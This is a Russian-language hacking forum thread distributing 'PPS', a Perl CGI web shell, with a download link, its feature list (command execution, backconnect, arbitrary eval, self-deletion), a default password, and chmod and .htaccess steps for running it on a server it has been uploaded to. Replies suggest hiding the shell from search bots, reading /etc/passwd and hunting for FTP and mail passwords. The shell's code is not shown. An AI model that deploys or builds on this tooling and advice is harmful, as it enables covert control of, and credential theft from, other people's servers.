PPS 1.0 perl-cgi web shell

Discussion in 'PHP' started by Pashkela, 21 Apr 2010.

  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    PPS 3.0 perl-cgi web shell

    PPS 3.0 perl web-shell <=download

    PPS 3.0 perl-cgi web shell

    [​IMG]

    SIZE: 49,73 KB

    last update - 09.03.2012 18:34

    • Авторизация на cookies
    • SystemInfo - информация о сервере
    • Файловый менеджер - листинг, загрузка, скачка, выполнение команд,просмотр файлов, редактирование файлов, chmod+touch+zip+unzip+delete папок/файлов в один клик, links
    • Консоль (история, стрелочки, алиасы, автофокус)
    • Mysql-менеджер
    • Бекконект Perl
    • Выполнение perl-кода из формы (eval)
    • Logout
    • Самоудаление
    • Работа через POST

    Default password: root

    PS: update - устранение багов c error.log & access.log !

    Просьба отписываться о найденных багах в теме, по мере возможности будут устранены

    PS: на всякий случай

    • Залили
    • chmod 0755 на файл
    • Не сработало - пробуем залить в эту же папку такой .htaccess:

      Code:
      Options +ExecCGI
      AddHandler cgi-script cgi pl
      
    • В windows не работает
     
    #1 Pashkela, 21 Apr 2010
    Last edited: 9 Mar 2012
    7 people like this.
  2. Failure

    Failure Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    179
    Likes Received:
    46
    Reputations:
    16
    375 строка
    Code:
    $s = "which gcc;which perl;which [B]phyton[/B];
    
    мб python?

    не хватает читалки /etc/passwd (что ли posix-getpwuid) ну и поисковым ботам ответ 404 возвращай.
    поискал "rm -r" - не нашлось, не знаю как так будут удалятся папки.
    имхо очень сырой шелл рано выложил
     
    1 person likes this.
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    Спасибо за подсказки, буду дорабатывать.

    update: все действия в шелле стали через POST
     
  4. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    315
    Likes Received:
    69
    Reputations:
    6
    Зачем она тебе нужна?

    Навигация по БД не удобна.... только по одной колонки можно смотреть данные. Некорректно работают конструкции: select id,user ... или select * ... выводит всегда одну колонку. Сделай навигацию как в wso.
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    хы, в процессе, пока можно так

    select concat_ws(0x3a,id,user) from ....
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    небольшой рестайлинг
     
    #6 Pashkela, 23 Apr 2010
    Last edited: 26 Apr 2010
    1 person likes this.
  7. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    315
    Likes Received:
    69
    Reputations:
    6
    Вот это уже не плохо) ++
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    В общем доделал. Вроде юзабельно. Обновления в 1-м посте
     
  9. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    207
    Likes Received:
    134
    Reputations:
    6
    прикрути свой диз,подумал это всо =\
     
  10. Peklots

    Peklots Elder - Старейшина

    Joined:
    28 Sep 2008
    Messages:
    413
    Likes Received:
    144
    Reputations:
    36
    WSO.pl
     
  11. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    551
    Likes Received:
    86
    Reputations:
    19
    зачем изобретать ненужный велосипед? чем диз всо не нравится?

    шелл должен выполнять свои ф-и, быть компактным и универсальным... а не с дизайном от артемия лебедева....
     
  12. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29
    Спасибо за шел. Реально нужная вещь.
     
  13. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    207
    Likes Received:
    134
    Reputations:
    6
    читай правильно мой пост
     
  14. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    551
    Likes Received:
    86
    Reputations:
    19
    вроде бы все правильно прочитал
     
  15. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    736
    Likes Received:
    404
    Reputations:
    134
    можно ж заменить на
     
  16. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    207
    Likes Received:
    134
    Reputations:
    6
    тепер подумай
     
  17. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    Pashkela суперский шел !!!!

    парочку нюансов заметил:
    * не сжимает ответ gzip-ом (хотя возможно сервак такой попался)
    * если в Files выбрать галку Name то выделения всех, как в wso в той же ситуации, не происходит
    * для [zip] надо бы сделать выбор пути куда будет сохранятся результат, а то редко бывает когда где хошь, там и пишешь

    ps версия от 28,04,10

    [добавлено]
    да, кстати, я так понял групповых операций нет ? т.е. выделяй, не выделяй галочками операция проводится только над тем файлом/папкой напротив которой выбрана команда... а в wso все это есть ;) можно ?
     
    #17 DrakonHaSh, 17 May 2010
    Last edited: 17 May 2010
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    версия децл обновлена уже, пароль от шелла в md5 + еще пара исправлений. Качайте новую. Групповых операций пока нет, выбирать путь, куда архивировать в принципе можно сделать, архивация/разархивация путем тыканья кнопы - пока только поддержка tar, остальное ручками

    В принципе от дальнейших апдейтов останавливает только то, что пока не нашел, как сжимать perl-скрипт, просто у меня планка 50кб) Всяческие perl-обфускаторы не уменьшают размер скрипта, а так в принципе туда можно много еще чего понапихать, начиная от стрингтулз и заканчивая всякими брутерами, вплоть до MD5, что на перле будет конечно гораздо быстрее и актуальнее. Просто дело в том, что все эти навороты можно поназагружать отдельными скриптами, так что не вижу смысла особого

    PS: Представленный шелл далеко не WSO, ув. oRb просто маньяк, когда ми его код поизучал), PSS 1.0 просто был сделан, потому что не видел пока ни одного нормального GUI perl-шелла, для облегчения навигации в основном. Так что сравнивать тут, мягко говоря, нечего, кроме того, что дизайн был слизан из WSO, т.к. для меня это уже эталон
     
  19. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    насчет понапихать. в чем смысл, суть шела ? получение доступа к системе, облегчение доступа к системе. исходя из этого, мне кажется, было бы здорово реализовать что-то типа анализа системы - поиска файлов с ftp парлолями, mail паролями и прочей инфы, которая полезна при исследовании системы.
    насчет ограничения в 50К - как вариант, например, сделать подгружаемые модули - указать в настройках хост/ip где лежат модули и при необходимости копировать их куда надо или в tmp
    perl же вообще намного более удобный инструмент для исследования системы, чем php, а тулзы ты классные и полезные умеешь писать ...
     
Loading...